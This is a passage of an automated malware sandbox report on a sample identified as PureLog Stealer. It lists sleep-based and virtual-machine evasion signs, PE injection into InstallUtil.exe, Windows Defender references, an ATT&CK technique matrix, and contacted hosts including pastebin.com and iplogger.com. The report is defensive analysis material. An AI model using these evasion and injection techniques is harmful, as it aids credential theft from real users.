                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2135Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7672Jump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 4868Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 6844Thread sleep time: -63000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 3988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 796Thread sleep count: 2135 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 796Thread sleep count: 7672 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -599438s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -599313s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -599188s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -599063s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -598953s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -598844s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -598719s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -598610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -598485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -598360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -598235s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -598110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -597985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -597860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -597735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -597610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -597485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -597360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -597235s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -597110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -596985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -596860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -596735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -596610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -596485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -596360s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -596235s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -596110s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -595985s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -595860s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -595735s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -595610s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -595485s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -595368s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -595260s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -594796s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1728Thread sleep time: -300000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -594687s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -594578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -594468s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -594359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -594249s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -594140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -594030s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -593921s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6852Thread sleep time: -593813s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595368Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595260Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 300000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594030Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593813Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: Amcache.hve.8.drBinary or memory string: VMware
                    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                    Source: file.exe, 00000001.00000002.3516306034.0000000004E4E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.3517750874.0000000006910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                    Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: InstallUtil.exe, 00000008.00000002.4056738976.0000000000B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                    Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                    Source: file.exe, 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hGfSAiwNzhMIMJd5FES8
                    Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: file.exe, 00000001.00000002.3517750874.0000000006910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 520000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 520000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 522000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 524000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 526000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 2D1008Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63A008Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 00000001.00000002.3546455241.000000000F249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information11
                    Scripting                    		1
                    Valid Accounts                    		Windows Management Instrumentation11
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		OS Credential Dumping2
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Valid Accounts                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory12
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Valid Accounts                    		1
                    Access Token Manipulation                    		1
                    Obfuscated Files or Information                    		Security Account Manager11
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		211
                    Process Injection                    		1
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		LSA Secrets31
                    Virtualization/Sandbox Evasion                    		SSHKeylogging4
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Valid Accounts                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Hidden Files and Directories                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1510394 Sample: file.exe Startdate: 12/09/2024 Architecture: WINDOWS Score: 100 44 pastebin.com 2->44 46 yip.su 2->46 48 iplogger.com 2->48 50 Antivirus detection for URL or domain 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Yara detected PureLog Stealer 2->54 58 7 other signatures 2->58 7 file.exe 3 2->7         started        11 cmd.exe 1 2->11         started        13 cmd.exe 1 2->13         started        15 2 other processes 2->15 signatures3 56 Connects to a pastebin service (likely for C&C) 44->56 process4 file5 36 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 7->36 dropped 64 Writes to foreign memory regions 7->64 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 7->66 68 Injects a PE file into a foreign processes 7->68 17 InstallUtil.exe 15 9 7->17         started        21 InstallUtil.exe 7->21         started        24 conhost.exe 11->24         started        26 conhost.exe 13->26         started        28 conhost.exe 15->28         started        30 conhost.exe 15->30         started        signatures6 process7 dnsIp8 38 pastebin.com 